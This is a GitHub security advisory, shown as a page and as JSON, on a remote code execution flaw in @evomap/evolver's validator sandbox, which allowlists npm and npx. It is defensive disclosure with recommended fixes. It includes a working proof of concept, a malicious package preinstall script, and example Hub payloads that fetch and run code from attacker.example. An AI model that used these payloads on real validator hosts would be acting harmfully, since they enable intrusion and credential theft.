GHSA-JXH8-JH77-XH6G

Vulnerability from github – Published: 2026-05-05 21:15 – Updated: 2026-05-05 21:15
VLAI
Summary
@evomap/evolver's validator sandbox allowlist permits `npm`/`npx`, yielding RCE from Hub-delivered validation tasks via lifecycle scripts
Details

Summary

The validator-mode sandbox executor (src/gep/validator/sandboxExecutor.js) places npm and npx in its hard executable allowlist. Because npm install <pkg> and npx -y -p <pkg> <bin> execute arbitrary code by design (preinstall/install/postinstall lifecycle scripts and remote-package bin entries), and because validator nodes consume validation_commands strings from unsigned Hub responses with no per-response signature check, an attacker who controls or MITMs the Hub achieves automatic remote code execution on every validator node within one daemon poll (default 60s).

Details

End-to-end chain:

  1. src/gep/validator/index.js:71-87fetchValidationTasks() POSTs to <hub>/a2a/fetch and reads validation_tasks from the JSON response. The outbound request is signed via buildHubHeaders(), but the Hub's response is parsed directly with await res.json() and no signature is verified on data.payload.

  2. src/gep/validator/index.js:98-108validateOneTask() extracts task.validation_commands (an array of attacker-controlled strings) and passes it straight to runInSandbox(commands, {}). No call to policyCheck.isValidationCommandAllowed() happens on this path. The author's own comment at sandboxExecutor.js:41-42 acknowledges this gap: "This closes the gap where validation_commands go straight from Hub to runInSandbox without passing through policyCheck.isValidationCommandAllowed()."

  3. src/gep/validator/sandboxExecutor.js:172-218runSingleCommand calls parseCommand(cmd), then checks ALLOWED_EXECUTABLES.has(parsed.executable):

js // sandboxExecutor.js:35 const ALLOWED_EXECUTABLES = new Set(['node', 'npm', 'npx']);

parseCommand only rejects shell metacharacters (| & ; > < \ $) and unbalanced quotes. A string likenpm install /tmp/evil-pkg --no-audit --no-fundcontains none of those and parses cleanly into{ executable: 'npm', args: [...] }`.

  1. sandboxExecutor.js:54-66assertNodeCommandSafe is a no-op for non-node executables:

js function assertNodeCommandSafe(parsed) { if (parsed.executable !== 'node') return; // npm/npx skip every check ... }

The BLOCKED_NODE_FLAGS set (-e, -r, --loader, etc.) therefore never gates npm or npx invocations.

  1. sandboxExecutor.js:213spawn('npm', [...], { shell: false, cwd: sandboxDir, env }) runs npm. npm's documented behavior is to execute the package's preinstall, install, and postinstall scripts; npx downloads a remote package and executes its bin entry. Both yield arbitrary code execution in the validator process's UID/permissions.

  2. src/gep/validator/index.js:189 — the validator daemon polls every 60s by default (EVOLVER_VALIDATOR_DAEMON_INTERVAL_MS), and validator mode is on by default since v1.69.0 (isValidatorEnabled() returns true unless explicitly disabled, index.js:25-34).

The "sandbox" is nominal: it sets a fresh cwd and a stripped env (HOME → tmpdir to hide ~/.npmrc/~/.ssh), but PATH is preserved (so npm/npx resolve), there is no container/chroot/seccomp/uid drop, and nothing prevents the spawned process from writing arbitrary files, opening outbound connections, or reading any file readable by the validator process.

The author's documented threat model at sandboxExecutor.js:31-34 explicitly includes Hub compromise:

"Any command whose first token is not in this set is rejected before spawn(). This prevents command injection via Hub-delivered task.command strings even if Hub itself is compromised or mis-signs a task."

Putting npm and npx on that allowlist defeats that stated goal — both are arbitrary-code-execution-by-design tools.

PoC

Reproduced against v1.70.0-beta.4 (HEAD on main):

Step 1 — plant a malicious package locally (the remote-tarball variant works identically; npm fetches and runs lifecycle scripts in both cases):

mkdir -p /tmp/evil-pkg-validator
cat > /tmp/evil-pkg-validator/package.json <<'EOF'
{
  "name":"evil-pkg-validator","version":"1.0.0",
  "scripts":{
    "preinstall":"node -e \"require('fs').writeFileSync('/tmp/pwned-by-validator-test','RCE uid='+process.getuid()+' time='+Date.now())\""
  }
}
EOF

Step 2 — invoke the exact code path used by validateOneTask() when the Hub returns a task with validation_commands: ["npm install /tmp/evil-pkg-validator --no-audit --no-fund"]:

rm -f /tmp/pwned-by-validator-test
node -e "
const s = require('./src/gep/validator/sandboxExecutor');
s.runInSandbox(
  ['npm install /tmp/evil-pkg-validator --no-audit --no-fund'],
  { cmdTimeoutMs: 60000 }
).then(o => {
  console.log('overallOk:', o.overallOk, 'exitCode:', o.results[0].exitCode);
  console.log('PWNED:', require('fs').readFileSync('/tmp/pwned-by-validator-test','utf8'));
});"

Observed output (verified):

overallOk: true exitCode: 0
PWNED: RCE uid=0 time=1777213140205

The sandbox reports overallOk: true (it sees a clean exit-0 from npm), while the preinstall script has already written /tmp/pwned-by-validator-test outside the sandbox directory — uncontained code execution as the validator UID.

Remote-only variant (no local file required): a compromised or MITM'd Hub returns:

{ "validation_commands": ["npm install https://attacker.example/evil.tgz --no-audit --no-fund"] }

or

{ "validation_commands": ["npx -y -p evil-pkg@1.0.0 evil-cmd"] }

Both pass parseCommand() (no shell metacharacters), pass ALLOWED_EXECUTABLES.has('npm'|'npx'), and assertNodeCommandSafe is a no-op for them. npm/npx fetch the remote tarball and execute its lifecycle/bin scripts on the validator host.

Impact

  • Arbitrary code execution as the evolver/validator process UID on every validator node that polls the malicious Hub (one cycle ≈ 60s by default).
  • Credential exfiltration: HUB_NODE_SECRET, A2A node identity, any cloud/cred material readable by the process.
  • Persistence / lateral movement: write to user-writable cron, systemd-user units, shell rc files; pivot into the host's container / VM.
  • Wormable across the network: a single Hub compromise auto-RCEs every node running validator mode — and validator mode is opt-out / on by default since v1.69.0.
  • Defeats the documented sandbox guarantee: the executor advertises defense against a compromised Hub; in practice, two of its three allowed binaries are arbitrary-code-execution tools.

Recommended Fix

Remove npm and npx from ALLOWED_EXECUTABLES. Validation tasks need only node <script>:

// src/gep/validator/sandboxExecutor.js
const ALLOWED_EXECUTABLES = new Set(['node']);

If npm test / npx vitest style commands must remain reachable from the Hub path, harden them explicitly:

function assertNpmCommandSafe(parsed) {
  if (parsed.executable !== 'npm' && parsed.executable !== 'npx') return;
  // Block install/exec/run-script that fetch or execute lifecycle scripts.
  const sub = parsed.args.find((a) => !a.startsWith('-'));
  const FORBIDDEN = new Set(['install', 'i', 'add', 'ci', 'exec', 'x', 'run', 'run-script', 'rebuild', 'pack', 'publish']);
  if (FORBIDDEN.has(sub)) {
    throw new Error('npm/npx subcommand not allowed in sandbox: ' + sub);
  }
  // Require --ignore-scripts on every npm invocation as defense-in-depth.
  if (parsed.executable === 'npm' && !parsed.args.includes('--ignore-scripts')) {
    throw new Error('npm in sandbox requires --ignore-scripts');
  }
  // npx always fetches+executes — disallow entirely.
  if (parsed.executable === 'npx') {
    throw new Error('npx is not allowed in sandbox');
  }
}

Additionally:

  1. Sign the Hub's /a2a/fetch response the same way outbound requests are signed (buildHubHeaders). Verify the signature on data.payload in fetchValidationTasks before handing tasks to runInSandbox. This closes the network-MITM variant that does not require Hub compromise.
  2. Run runInSandbox under real isolation — drop privileges, disable network, mount tmpfs, apply seccomp — rather than relying solely on an allowlist. The current buildSandboxEnv only redirects HOME/TMPDIR; the spawned process otherwise has full host access.
  3. Apply policyCheck.isValidationCommandAllowed() to Hub-delivered validation_commands in validateOneTask, mirroring the gate that already exists for capsule-derived commands in solidify.js / skill2gep.js.
Severity
8.1 (High)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.70.0-beta.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@evomap/evolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.70.0-beta.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-05T21:15:55Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe validator-mode sandbox executor (`src/gep/validator/sandboxExecutor.js`) places `npm` and `npx` in its hard executable allowlist. Because `npm install \u003cpkg\u003e` and `npx -y -p \u003cpkg\u003e \u003cbin\u003e` execute arbitrary code by design (preinstall/install/postinstall lifecycle scripts and remote-package bin entries), and because validator nodes consume `validation_commands` strings from unsigned Hub responses with no per-response signature check, an attacker who controls or MITMs the Hub achieves automatic remote code execution on every validator node within one daemon poll (default 60s).\n\n## Details\n\nEnd-to-end chain:\n\n1. `src/gep/validator/index.js:71-87` \u2014 `fetchValidationTasks()` POSTs to `\u003chub\u003e/a2a/fetch` and reads `validation_tasks` from the JSON response. The outbound request is signed via `buildHubHeaders()`, but the Hub\u0027s response is parsed directly with `await res.json()` and no signature is verified on `data.payload`.\n\n2. `src/gep/validator/index.js:98-108` \u2014 `validateOneTask()` extracts `task.validation_commands` (an array of attacker-controlled strings) and passes it straight to `runInSandbox(commands, {})`. No call to `policyCheck.isValidationCommandAllowed()` happens on this path. The author\u0027s own comment at `sandboxExecutor.js:41-42` acknowledges this gap: *\"This closes the gap where validation_commands go straight from Hub to runInSandbox without passing through policyCheck.isValidationCommandAllowed().\"*\n\n3. `src/gep/validator/sandboxExecutor.js:172-218` \u2014 `runSingleCommand` calls `parseCommand(cmd)`, then checks `ALLOWED_EXECUTABLES.has(parsed.executable)`:\n\n   ```js\n   // sandboxExecutor.js:35\n   const ALLOWED_EXECUTABLES = new Set([\u0027node\u0027, \u0027npm\u0027, \u0027npx\u0027]);\n   ```\n\n   `parseCommand` only rejects shell metacharacters (`| \u0026 ; \u003e \u003c \\` $`) and unbalanced quotes. A string like `npm install /tmp/evil-pkg --no-audit --no-fund` contains none of those and parses cleanly into `{ executable: \u0027npm\u0027, args: [...] }`.\n\n4. `sandboxExecutor.js:54-66` \u2014 `assertNodeCommandSafe` is a no-op for non-`node` executables:\n\n   ```js\n   function assertNodeCommandSafe(parsed) {\n     if (parsed.executable !== \u0027node\u0027) return;   // npm/npx skip every check\n     ...\n   }\n   ```\n\n   The `BLOCKED_NODE_FLAGS` set (`-e`, `-r`, `--loader`, etc.) therefore never gates `npm` or `npx` invocations.\n\n5. `sandboxExecutor.js:213` \u2014 `spawn(\u0027npm\u0027, [...], { shell: false, cwd: sandboxDir, env })` runs `npm`. npm\u0027s documented behavior is to execute the package\u0027s `preinstall`, `install`, and `postinstall` scripts; `npx` downloads a remote package and executes its `bin` entry. Both yield arbitrary code execution in the validator process\u0027s UID/permissions.\n\n6. `src/gep/validator/index.js:189` \u2014 the validator daemon polls every 60s by default (`EVOLVER_VALIDATOR_DAEMON_INTERVAL_MS`), and validator mode is **on by default** since v1.69.0 (`isValidatorEnabled()` returns `true` unless explicitly disabled, `index.js:25-34`).\n\nThe \"sandbox\" is nominal: it sets a fresh `cwd` and a stripped env (HOME \u2192 tmpdir to hide `~/.npmrc`/`~/.ssh`), but `PATH` is preserved (so `npm`/`npx` resolve), there is no container/chroot/seccomp/uid drop, and nothing prevents the spawned process from writing arbitrary files, opening outbound connections, or reading any file readable by the validator process.\n\nThe author\u0027s documented threat model at `sandboxExecutor.js:31-34` explicitly includes Hub compromise:\n\n\u003e \"Any command whose first token is not in this set is rejected before spawn(). This prevents command injection via Hub-delivered task.command strings even if Hub itself is compromised or mis-signs a task.\"\n\nPutting `npm` and `npx` on that allowlist defeats that stated goal \u2014 both are arbitrary-code-execution-by-design tools.\n\n## PoC\n\nReproduced against v1.70.0-beta.4 (HEAD on `main`):\n\nStep 1 \u2014 plant a malicious package locally (the remote-tarball variant works identically; npm fetches and runs lifecycle scripts in both cases):\n\n```bash\nmkdir -p /tmp/evil-pkg-validator\ncat \u003e /tmp/evil-pkg-validator/package.json \u003c\u003c\u0027EOF\u0027\n{\n  \"name\":\"evil-pkg-validator\",\"version\":\"1.0.0\",\n  \"scripts\":{\n    \"preinstall\":\"node -e \\\"require(\u0027fs\u0027).writeFileSync(\u0027/tmp/pwned-by-validator-test\u0027,\u0027RCE uid=\u0027+process.getuid()+\u0027 time=\u0027+Date.now())\\\"\"\n  }\n}\nEOF\n```\n\nStep 2 \u2014 invoke the exact code path used by `validateOneTask()` when the Hub returns a task with `validation_commands: [\"npm install /tmp/evil-pkg-validator --no-audit --no-fund\"]`:\n\n```bash\nrm -f /tmp/pwned-by-validator-test\nnode -e \"\nconst s = require(\u0027./src/gep/validator/sandboxExecutor\u0027);\ns.runInSandbox(\n  [\u0027npm install /tmp/evil-pkg-validator --no-audit --no-fund\u0027],\n  { cmdTimeoutMs: 60000 }\n).then(o =\u003e {\n  console.log(\u0027overallOk:\u0027, o.overallOk, \u0027exitCode:\u0027, o.results[0].exitCode);\n  console.log(\u0027PWNED:\u0027, require(\u0027fs\u0027).readFileSync(\u0027/tmp/pwned-by-validator-test\u0027,\u0027utf8\u0027));\n});\"\n```\n\nObserved output (verified):\n\n```\noverallOk: true exitCode: 0\nPWNED: RCE uid=0 time=1777213140205\n```\n\nThe sandbox reports `overallOk: true` (it sees a clean exit-0 from `npm`), while the preinstall script has already written `/tmp/pwned-by-validator-test` outside the sandbox directory \u2014 uncontained code execution as the validator UID.\n\nRemote-only variant (no local file required): a compromised or MITM\u0027d Hub returns:\n\n```json\n{ \"validation_commands\": [\"npm install https://attacker.example/evil.tgz --no-audit --no-fund\"] }\n```\n\nor\n\n```json\n{ \"validation_commands\": [\"npx -y -p evil-pkg@1.0.0 evil-cmd\"] }\n```\n\nBoth pass `parseCommand()` (no shell metacharacters), pass `ALLOWED_EXECUTABLES.has(\u0027npm\u0027|\u0027npx\u0027)`, and `assertNodeCommandSafe` is a no-op for them. npm/npx fetch the remote tarball and execute its lifecycle/bin scripts on the validator host.\n\n## Impact\n\n- **Arbitrary code execution** as the evolver/validator process UID on every validator node that polls the malicious Hub (one cycle \u2248 60s by default).\n- **Credential exfiltration**: HUB_NODE_SECRET, A2A node identity, any cloud/cred material readable by the process.\n- **Persistence / lateral movement**: write to user-writable cron, systemd-user units, shell rc files; pivot into the host\u0027s container / VM.\n- **Wormable across the network**: a single Hub compromise auto-RCEs every node running validator mode \u2014 and validator mode is opt-out / on by default since v1.69.0.\n- **Defeats the documented sandbox guarantee**: the executor advertises defense against a compromised Hub; in practice, two of its three allowed binaries are arbitrary-code-execution tools.\n\n## Recommended Fix\n\nRemove `npm` and `npx` from `ALLOWED_EXECUTABLES`. Validation tasks need only `node \u003cscript\u003e`:\n\n```js\n// src/gep/validator/sandboxExecutor.js\nconst ALLOWED_EXECUTABLES = new Set([\u0027node\u0027]);\n```\n\nIf `npm test` / `npx vitest` style commands must remain reachable from the Hub path, harden them explicitly:\n\n```js\nfunction assertNpmCommandSafe(parsed) {\n  if (parsed.executable !== \u0027npm\u0027 \u0026\u0026 parsed.executable !== \u0027npx\u0027) return;\n  // Block install/exec/run-script that fetch or execute lifecycle scripts.\n  const sub = parsed.args.find((a) =\u003e !a.startsWith(\u0027-\u0027));\n  const FORBIDDEN = new Set([\u0027install\u0027, \u0027i\u0027, \u0027add\u0027, \u0027ci\u0027, \u0027exec\u0027, \u0027x\u0027, \u0027run\u0027, \u0027run-script\u0027, \u0027rebuild\u0027, \u0027pack\u0027, \u0027publish\u0027]);\n  if (FORBIDDEN.has(sub)) {\n    throw new Error(\u0027npm/npx subcommand not allowed in sandbox: \u0027 + sub);\n  }\n  // Require --ignore-scripts on every npm invocation as defense-in-depth.\n  if (parsed.executable === \u0027npm\u0027 \u0026\u0026 !parsed.args.includes(\u0027--ignore-scripts\u0027)) {\n    throw new Error(\u0027npm in sandbox requires --ignore-scripts\u0027);\n  }\n  // npx always fetches+executes \u2014 disallow entirely.\n  if (parsed.executable === \u0027npx\u0027) {\n    throw new Error(\u0027npx is not allowed in sandbox\u0027);\n  }\n}\n```\n\nAdditionally:\n\n1. **Sign the Hub\u0027s `/a2a/fetch` *response*** the same way outbound requests are signed (`buildHubHeaders`). Verify the signature on `data.payload` in `fetchValidationTasks` before handing tasks to `runInSandbox`. This closes the network-MITM variant that does not require Hub compromise.\n2. **Run `runInSandbox` under real isolation** \u2014 drop privileges, disable network, mount tmpfs, apply seccomp \u2014 rather than relying solely on an allowlist. The current `buildSandboxEnv` only redirects `HOME`/`TMPDIR`; the spawned process otherwise has full host access.\n3. **Apply `policyCheck.isValidationCommandAllowed()` to Hub-delivered `validation_commands`** in `validateOneTask`, mirroring the gate that already exists for capsule-derived commands in `solidify.js` / `skill2gep.js`.",
  "id": "GHSA-jxh8-jh77-xh6g",
  "modified": "2026-05-05T21:15:55Z",
  "published": "2026-05-05T21:15:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-jxh8-jh77-xh6g"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EvoMap/evolver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@evomap/evolver\u0027s validator sandbox allowlist permits `npm`/`npx`, yielding RCE from Hub-delivered validation tasks via lifecycle scripts"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.